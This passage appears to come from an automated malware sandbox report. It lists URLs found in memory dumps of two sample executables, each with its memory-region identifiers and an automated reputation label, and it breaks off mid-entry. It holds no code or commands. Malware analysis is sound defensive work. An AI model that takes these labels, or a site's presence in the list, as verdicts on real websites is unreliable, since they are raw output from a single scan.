nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                                            http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.7nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                            https://www.com-sit.com/wp-content/uploads/2023/04/comsitBROWN-1.jpgnhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                                              http://www.mobilnic.net/mnhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000155D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              http://www.myropcb.com/why-use-myro/terms-of-service/nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              http://www.pcgrate.comnhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              https://lolipop.jp/nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.521508837.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.528726297.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.520474441.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652811266.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.519635310.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.643655921.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530679965.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                                https://www.com-sit.com/feed/nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                                  http://www.com-sit.com/wp-content/uploads/elementor/css/custom-jet-blocks.css?ver=1.3.6nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                                    http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.3.nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                    http://pohlfood.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                    http://www.yocinc.org/tected_storagenhVJ8J5qOt.exe, 00000000.00000003.739131542.0000000007721000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                    https://www.naoi-a.com/nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.528726297.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652811266.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.647419378.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530679965.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                    http://www.jenco.co.uk/vnhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000155D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                    http://www.speelhal.net/QnhVJ8J5qOt.exe, 00000000.00000003.651017417.00000000076D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                    https://www.com-sit.com/asien/nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                                      https://www.pcgrate.comnhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                      http://www.ka-mo-me.com/PnhVJ8J5qOt.exe, 00000000.00000003.738728504.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000015A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                      http://www.myropcb.com/wp-content/themes/framePCB/images/shopping_car.pngnhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 